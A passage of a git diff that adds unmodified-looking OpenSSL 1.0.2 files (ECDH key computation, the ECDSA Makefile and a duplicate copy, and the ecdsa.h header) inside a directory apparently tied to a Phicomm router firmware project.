+#include "cryptlib.h"
+
+#include "ech_locl.h"
+#include <openssl/err.h>
+#include <openssl/sha.h>
+#include <openssl/obj_mac.h>
+#include <openssl/bn.h>
+
+static int ecdh_compute_key(void *out, size_t len, const EC_POINT *pub_key,
+                            EC_KEY *ecdh,
+                            void *(*KDF) (const void *in, size_t inlen,
+                                          void *out, size_t *outlen));
+
+static ECDH_METHOD openssl_ecdh_meth = {
+    "OpenSSL ECDH method",
+    ecdh_compute_key,
+#if 0
+    NULL,                       /* init */
+    NULL,                       /* finish */
+#endif
+    0,                          /* flags */
+    NULL                        /* app_data */
+};
+
+const ECDH_METHOD *ECDH_OpenSSL(void)
+{
+    return &openssl_ecdh_meth;
+}
+
+/*-
+ * This implementation is based on the following primitives in the IEEE 1363 standard:
+ *  - ECKAS-DH1
+ *  - ECSVDP-DH
+ * Finally an optional KDF is applied.
+ */
+static int ecdh_compute_key(void *out, size_t outlen, const EC_POINT *pub_key,
+                            EC_KEY *ecdh,
+                            void *(*KDF) (const void *in, size_t inlen,
+                                          void *out, size_t *outlen))
+{
+    BN_CTX *ctx;
+    EC_POINT *tmp = NULL;
+    BIGNUM *x = NULL, *y = NULL;
+    const BIGNUM *priv_key;
+    const EC_GROUP *group;
+    int ret = -1;
+    size_t buflen, len;
+    unsigned char *buf = NULL;
+
+    if (outlen > INT_MAX) {
+        ECDHerr(ECDH_F_ECDH_COMPUTE_KEY, ERR_R_MALLOC_FAILURE); /* sort of,
+                                                                 * anyway */
+        return -1;
+    }
+
+    if ((ctx = BN_CTX_new()) == NULL)
+        goto err;
+    BN_CTX_start(ctx);
+    x = BN_CTX_get(ctx);
+    y = BN_CTX_get(ctx);
+
+    priv_key = EC_KEY_get0_private_key(ecdh);
+    if (priv_key == NULL) {
+        ECDHerr(ECDH_F_ECDH_COMPUTE_KEY, ECDH_R_NO_PRIVATE_VALUE);
+        goto err;
+    }
+
+    group = EC_KEY_get0_group(ecdh);
+
+    if (EC_KEY_get_flags(ecdh) & EC_FLAG_COFACTOR_ECDH) {
+        if (!EC_GROUP_get_cofactor(group, x, ctx) ||
+            !BN_mul(x, x, priv_key, ctx)) {
+            ECDHerr(ECDH_F_ECDH_COMPUTE_KEY, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        priv_key = x;
+    }
+
+    if ((tmp = EC_POINT_new(group)) == NULL) {
+        ECDHerr(ECDH_F_ECDH_COMPUTE_KEY, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (!EC_POINT_mul(group, tmp, NULL, pub_key, priv_key, ctx)) {
+        ECDHerr(ECDH_F_ECDH_COMPUTE_KEY, ECDH_R_POINT_ARITHMETIC_FAILURE);
+        goto err;
+    }
+
+    if (EC_METHOD_get_field_type(EC_GROUP_method_of(group)) ==
+        NID_X9_62_prime_field) {
+        if (!EC_POINT_get_affine_coordinates_GFp(group, tmp, x, y, ctx)) {
+            ECDHerr(ECDH_F_ECDH_COMPUTE_KEY, ECDH_R_POINT_ARITHMETIC_FAILURE);
+            goto err;
+        }
+    }
+#ifndef OPENSSL_NO_EC2M
+    else {
+        if (!EC_POINT_get_affine_coordinates_GF2m(group, tmp, x, y, ctx)) {
+            ECDHerr(ECDH_F_ECDH_COMPUTE_KEY, ECDH_R_POINT_ARITHMETIC_FAILURE);
+            goto err;
+        }
+    }
+#endif
+
+    buflen = (EC_GROUP_get_degree(group) + 7) / 8;
+    len = BN_num_bytes(x);
+    if (len > buflen) {
+        ECDHerr(ECDH_F_ECDH_COMPUTE_KEY, ERR_R_INTERNAL_ERROR);
+        goto err;
+    }
+    if ((buf = OPENSSL_malloc(buflen)) == NULL) {
+        ECDHerr(ECDH_F_ECDH_COMPUTE_KEY, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    memset(buf, 0, buflen - len);
+    if (len != (size_t)BN_bn2bin(x, buf + buflen - len)) {
+        ECDHerr(ECDH_F_ECDH_COMPUTE_KEY, ERR_R_BN_LIB);
+        goto err;
+    }
+
+    if (KDF != 0) {
+        if (KDF(buf, buflen, out, &outlen) == NULL) {
+            ECDHerr(ECDH_F_ECDH_COMPUTE_KEY, ECDH_R_KDF_FAILED);
+            goto err;
+        }
+        ret = outlen;
+    } else {
+        /* no KDF, just copy as much as we can */
+        if (outlen > buflen)
+            outlen = buflen;
+        memcpy(out, buf, outlen);
+        ret = outlen;
+    }
+
+ err:
+    if (tmp)
+        EC_POINT_free(tmp);
+    if (ctx)
+        BN_CTX_end(ctx);
+    if (ctx)
+        BN_CTX_free(ctx);
+    if (buf)
+        OPENSSL_free(buf);
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/Makefile
new file mode 100644
index 0000000..94d0568
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/Makefile
@@ -0,0 +1,125 @@
+#
+# crypto/ecdsa/Makefile
+#
+
+DIR=	ecdsa
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g -Wall
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=ecdsatest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	ecs_lib.c ecs_asn1.c ecs_ossl.c ecs_sign.c ecs_vrf.c ecs_err.c
+
+LIBOBJ=	ecs_lib.o ecs_asn1.o ecs_ossl.o ecs_sign.o ecs_vrf.o ecs_err.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= ecdsa.h
+HEADER=	ecs_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+ecs_asn1.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+ecs_asn1.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+ecs_asn1.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ecs_asn1.o: ../../include/openssl/ecdsa.h ../../include/openssl/err.h
+ecs_asn1.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+ecs_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ecs_asn1.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ecs_asn1.o: ../../include/openssl/symhacks.h ecs_asn1.c ecs_locl.h
+ecs_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ecs_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ecs_err.o: ../../include/openssl/ec.h ../../include/openssl/ecdsa.h
+ecs_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ecs_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+ecs_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ecs_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ecs_err.o: ecs_err.c
+ecs_lib.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ecs_lib.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ecs_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ecs_lib.o: ../../include/openssl/ecdsa.h ../../include/openssl/err.h
+ecs_lib.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+ecs_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ecs_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ecs_lib.o: ../../include/openssl/symhacks.h ecs_lib.c ecs_locl.h
+ecs_ossl.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ecs_ossl.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ecs_ossl.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ecs_ossl.o: ../../include/openssl/ecdsa.h ../../include/openssl/err.h
+ecs_ossl.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ecs_ossl.o: ../../include/openssl/opensslconf.h
+ecs_ossl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ecs_ossl.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ecs_ossl.o: ../../include/openssl/symhacks.h ecs_locl.h ecs_ossl.c
+ecs_sign.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ecs_sign.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ecs_sign.o: ../../include/openssl/ec.h ../../include/openssl/ecdsa.h
+ecs_sign.o: ../../include/openssl/opensslconf.h
+ecs_sign.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ecs_sign.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+ecs_sign.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ecs_sign.o: ecs_locl.h ecs_sign.c
+ecs_vrf.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ecs_vrf.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ecs_vrf.o: ../../include/openssl/ec.h ../../include/openssl/ecdsa.h
+ecs_vrf.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+ecs_vrf.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ecs_vrf.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ecs_vrf.o: ecs_locl.h ecs_vrf.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/Makefile.save
new file mode 100644
index 0000000..94d0568
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/Makefile.save
@@ -0,0 +1,125 @@
+#
+# crypto/ecdsa/Makefile
+#
+
+DIR=	ecdsa
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g -Wall
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=ecdsatest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	ecs_lib.c ecs_asn1.c ecs_ossl.c ecs_sign.c ecs_vrf.c ecs_err.c
+
+LIBOBJ=	ecs_lib.o ecs_asn1.o ecs_ossl.o ecs_sign.o ecs_vrf.o ecs_err.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= ecdsa.h
+HEADER=	ecs_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+ecs_asn1.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+ecs_asn1.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+ecs_asn1.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ecs_asn1.o: ../../include/openssl/ecdsa.h ../../include/openssl/err.h
+ecs_asn1.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+ecs_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ecs_asn1.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ecs_asn1.o: ../../include/openssl/symhacks.h ecs_asn1.c ecs_locl.h
+ecs_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ecs_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ecs_err.o: ../../include/openssl/ec.h ../../include/openssl/ecdsa.h
+ecs_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ecs_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+ecs_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ecs_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ecs_err.o: ecs_err.c
+ecs_lib.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ecs_lib.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ecs_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ecs_lib.o: ../../include/openssl/ecdsa.h ../../include/openssl/err.h
+ecs_lib.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+ecs_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ecs_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ecs_lib.o: ../../include/openssl/symhacks.h ecs_lib.c ecs_locl.h
+ecs_ossl.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ecs_ossl.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ecs_ossl.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ecs_ossl.o: ../../include/openssl/ecdsa.h ../../include/openssl/err.h
+ecs_ossl.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ecs_ossl.o: ../../include/openssl/opensslconf.h
+ecs_ossl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ecs_ossl.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ecs_ossl.o: ../../include/openssl/symhacks.h ecs_locl.h ecs_ossl.c
+ecs_sign.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ecs_sign.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ecs_sign.o: ../../include/openssl/ec.h ../../include/openssl/ecdsa.h
+ecs_sign.o: ../../include/openssl/opensslconf.h
+ecs_sign.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ecs_sign.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+ecs_sign.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ecs_sign.o: ecs_locl.h ecs_sign.c
+ecs_vrf.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ecs_vrf.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ecs_vrf.o: ../../include/openssl/ec.h ../../include/openssl/ecdsa.h
+ecs_vrf.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+ecs_vrf.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ecs_vrf.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ecs_vrf.o: ecs_locl.h ecs_vrf.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecdsa.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecdsa.h
new file mode 100644
index 0000000..c4016ac
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecdsa.h
@@ -0,0 +1,335 @@
+/* crypto/ecdsa/ecdsa.h */
+/**
+ * \file   crypto/ecdsa/ecdsa.h Include file for the OpenSSL ECDSA functions
+ * \author Written by Nils Larsch for the OpenSSL project
+ */
+/* ====================================================================
+ * Copyright (c) 2000-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+#ifndef HEADER_ECDSA_H
+# define HEADER_ECDSA_H
+
+# include <openssl/opensslconf.h>
+
+# ifdef OPENSSL_NO_ECDSA
+#  error ECDSA is disabled.
+# endif
+
+# include <openssl/ec.h>
+# include <openssl/ossl_typ.h>
+# ifndef OPENSSL_NO_DEPRECATED
+#  include <openssl/bn.h>
+# endif
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+typedef struct ECDSA_SIG_st {
+    BIGNUM *r;
+    BIGNUM *s;
+} ECDSA_SIG;
+
+/** Allocates and initialize a ECDSA_SIG structure
+ *  \return pointer to a ECDSA_SIG structure or NULL if an error occurred
+ */
+ECDSA_SIG *ECDSA_SIG_new(void);
+
+/** frees a ECDSA_SIG structure
+ *  \param  sig  pointer to the ECDSA_SIG structure
+ */
+void ECDSA_SIG_free(ECDSA_SIG *sig);
+
+/** DER encode content of ECDSA_SIG object (note: this function modifies *pp
+ *  (*pp += length of the DER encoded signature)).
+ *  \param  sig  pointer to the ECDSA_SIG object
+ *  \param  pp   pointer to a unsigned char pointer for the output or NULL
+ *  \return the length of the DER encoded ECDSA_SIG object or 0
+ */
+int i2d_ECDSA_SIG(const ECDSA_SIG *sig, unsigned char **pp);
+
+/** Decodes a DER encoded ECDSA signature (note: this function changes *pp
+ *  (*pp += len)).
+ *  \param  sig  pointer to ECDSA_SIG pointer (may be NULL)
+ *  \param  pp   memory buffer with the DER encoded signature
+ *  \param  len  length of the buffer
+ *  \return pointer to the decoded ECDSA_SIG structure (or NULL)
+ */
+ECDSA_SIG *d2i_ECDSA_SIG(ECDSA_SIG **sig, const unsigned char **pp, long len);
+
+/** Computes the ECDSA signature of the given hash value using
+ *  the supplied private key and returns the created signature.
+ *  \param  dgst      pointer to the hash value
+ *  \param  dgst_len  length of the hash value
+ *  \param  eckey     EC_KEY object containing a private EC key
+ *  \return pointer to a ECDSA_SIG structure or NULL if an error occurred
+ */
+ECDSA_SIG *ECDSA_do_sign(const unsigned char *dgst, int dgst_len,
+                         EC_KEY *eckey);
+
+/** Computes ECDSA signature of a given hash value using the supplied
+ *  private key (note: sig must point to ECDSA_size(eckey) bytes of memory).
+ *  \param  dgst     pointer to the hash value to sign
+ *  \param  dgstlen  length of the hash value
+ *  \param  kinv     BIGNUM with a pre-computed inverse k (optional)
+ *  \param  rp       BIGNUM with a pre-computed rp value (optioanl),
+ *                   see ECDSA_sign_setup
+ *  \param  eckey    EC_KEY object containing a private EC key
+ *  \return pointer to a ECDSA_SIG structure or NULL if an error occurred
+ */
+ECDSA_SIG *ECDSA_do_sign_ex(const unsigned char *dgst, int dgstlen,
+                            const BIGNUM *kinv, const BIGNUM *rp,
+                            EC_KEY *eckey);
+
+/** Verifies that the supplied signature is a valid ECDSA
+ *  signature of the supplied hash value using the supplied public key.
+ *  \param  dgst      pointer to the hash value
+ *  \param  dgst_len  length of the hash value
+ *  \param  sig       ECDSA_SIG structure
+ *  \param  eckey     EC_KEY object containing a public EC key
+ *  \return 1 if the signature is valid, 0 if the signature is invalid
+ *          and -1 on error
+ */
+int ECDSA_do_verify(const unsigned char *dgst, int dgst_len,
+                    const ECDSA_SIG *sig, EC_KEY *eckey);
+
+const ECDSA_METHOD *ECDSA_OpenSSL(void);
+
+/** Sets the default ECDSA method
+ *  \param  meth  new default ECDSA_METHOD
+ */
+void ECDSA_set_default_method(const ECDSA_METHOD *meth);
+
+/** Returns the default ECDSA method
+ *  \return pointer to ECDSA_METHOD structure containing the default method
+ */
+const ECDSA_METHOD *ECDSA_get_default_method(void);
+
+/** Sets method to be used for the ECDSA operations
+ *  \param  eckey  EC_KEY object
+ *  \param  meth   new method
+ *  \return 1 on success and 0 otherwise
+ */
+int ECDSA_set_method(EC_KEY *eckey, const ECDSA_METHOD *meth);
+
+/** Returns the maximum length of the DER encoded signature
+ *  \param  eckey  EC_KEY object
+ *  \return numbers of bytes required for the DER encoded signature
+ */
+int ECDSA_size(const EC_KEY *eckey);
+
+/** Precompute parts of the signing operation
+ *  \param  eckey  EC_KEY object containing a private EC key
+ *  \param  ctx    BN_CTX object (optional)
+ *  \param  kinv   BIGNUM pointer for the inverse of k
+ *  \param  rp     BIGNUM pointer for x coordinate of k * generator
+ *  \return 1 on success and 0 otherwise
+ */
+int ECDSA_sign_setup(EC_KEY *eckey, BN_CTX *ctx, BIGNUM **kinv, BIGNUM **rp);
+
+/** Computes ECDSA signature of a given hash value using the supplied
+ *  private key (note: sig must point to ECDSA_size(eckey) bytes of memory).
+ *  \param  type     this parameter is ignored
+ *  \param  dgst     pointer to the hash value to sign
+ *  \param  dgstlen  length of the hash value
+ *  \param  sig      memory for the DER encoded created signature
+ *  \param  siglen   pointer to the length of the returned signature
+ *  \param  eckey    EC_KEY object containing a private EC key
+ *  \return 1 on success and 0 otherwise
+ */
+int ECDSA_sign(int type, const unsigned char *dgst, int dgstlen,
+               unsigned char *sig, unsigned int *siglen, EC_KEY *eckey);
+
+/** Computes ECDSA signature of a given hash value using the supplied
+ *  private key (note: sig must point to ECDSA_size(eckey) bytes of memory).
+ *  \param  type     this parameter is ignored
+ *  \param  dgst     pointer to the hash value to sign
+ *  \param  dgstlen  length of the hash value
+ *  \param  sig      buffer to hold the DER encoded signature
+ *  \param  siglen   pointer to the length of the returned signature
+ *  \param  kinv     BIGNUM with a pre-computed inverse k (optional)
+ *  \param  rp       BIGNUM with a pre-computed rp value (optioanl),
+ *                   see ECDSA_sign_setup
+ *  \param  eckey    EC_KEY object containing a private EC key
+ *  \return 1 on success and 0 otherwise
+ */
+int ECDSA_sign_ex(int type, const unsigned char *dgst, int dgstlen,
+                  unsigned char *sig, unsigned int *siglen,
+                  const BIGNUM *kinv, const BIGNUM *rp, EC_KEY *eckey);
+
+/** Verifies that the given signature is valid ECDSA signature
+ *  of the supplied hash value using the specified public key.
+ *  \param  type     this parameter is ignored
+ *  \param  dgst     pointer to the hash value
+ *  \param  dgstlen  length of the hash value
+ *  \param  sig      pointer to the DER encoded signature
+ *  \param  siglen   length of the DER encoded signature
+ *  \param  eckey    EC_KEY object containing a public EC key
+ *  \return 1 if the signature is valid, 0 if the signature is invalid
+ *          and -1 on error
+ */
+int ECDSA_verify(int type, const unsigned char *dgst, int dgstlen,
+                 const unsigned char *sig, int siglen, EC_KEY *eckey);
+
+/* the standard ex_data functions */
+int ECDSA_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new
+                           *new_func, CRYPTO_EX_dup *dup_func,
+                           CRYPTO_EX_free *free_func);
+int ECDSA_set_ex_data(EC_KEY *d, int idx, void *arg);
+void *ECDSA_get_ex_data(EC_KEY *d, int idx);
+
+/** Allocates and initialize a ECDSA_METHOD structure
+ *  \param ecdsa_method pointer to ECDSA_METHOD to copy.  (May be NULL)
+ *  \return pointer to a ECDSA_METHOD structure or NULL if an error occurred
+ */
+
+ECDSA_METHOD *ECDSA_METHOD_new(ECDSA_METHOD *ecdsa_method);
+
+/** frees a ECDSA_METHOD structure
+ *  \param  ecdsa_method  pointer to the ECDSA_METHOD structure
+ */
+void ECDSA_METHOD_free(ECDSA_METHOD *ecdsa_method);
+
+/**  Sets application specific data in the ECDSA_METHOD
+ *   \param  ecdsa_method pointer to existing ECDSA_METHOD
+ *   \param  app application specific data to set
+ */
+
+void ECDSA_METHOD_set_app_data(ECDSA_METHOD *ecdsa_method, void *app);
+
+/** Returns application specific data from a ECDSA_METHOD structure
+ *  \param ecdsa_method pointer to ECDSA_METHOD structure
+ *  \return pointer to application specific data.
+ */
+
+void *ECDSA_METHOD_get_app_data(ECDSA_METHOD *ecdsa_method);
+
+/**  Set the ECDSA_do_sign function in the ECDSA_METHOD
+ *   \param  ecdsa_method  pointer to existing ECDSA_METHOD
+ *   \param  ecdsa_do_sign a funtion of type ECDSA_do_sign
+ */
+
+void ECDSA_METHOD_set_sign(ECDSA_METHOD *ecdsa_method,
+                           ECDSA_SIG *(*ecdsa_do_sign) (const unsigned char
+                                                        *dgst, int dgst_len,
+                                                        const BIGNUM *inv,
+                                                        const BIGNUM *rp,
+                                                        EC_KEY *eckey));
+
+/**  Set the  ECDSA_sign_setup function in the ECDSA_METHOD
+ *   \param  ecdsa_method  pointer to existing ECDSA_METHOD
+ *   \param  ecdsa_sign_setup a funtion of type ECDSA_sign_setup
+ */
+
+void ECDSA_METHOD_set_sign_setup(ECDSA_METHOD *ecdsa_method,
+                                 int (*ecdsa_sign_setup) (EC_KEY *eckey,
+                                                          BN_CTX *ctx,
+                                                          BIGNUM **kinv,
+                                                          BIGNUM **r));
+
+/**  Set the ECDSA_do_verify function in the ECDSA_METHOD
+ *   \param  ecdsa_method  pointer to existing ECDSA_METHOD
+ *   \param  ecdsa_do_verify a funtion of type ECDSA_do_verify
+ */
+
+void ECDSA_METHOD_set_verify(ECDSA_METHOD *ecdsa_method,
+                             int (*ecdsa_do_verify) (const unsigned char
+                                                     *dgst, int dgst_len,
+                                                     const ECDSA_SIG *sig,
+                                                     EC_KEY *eckey));
+
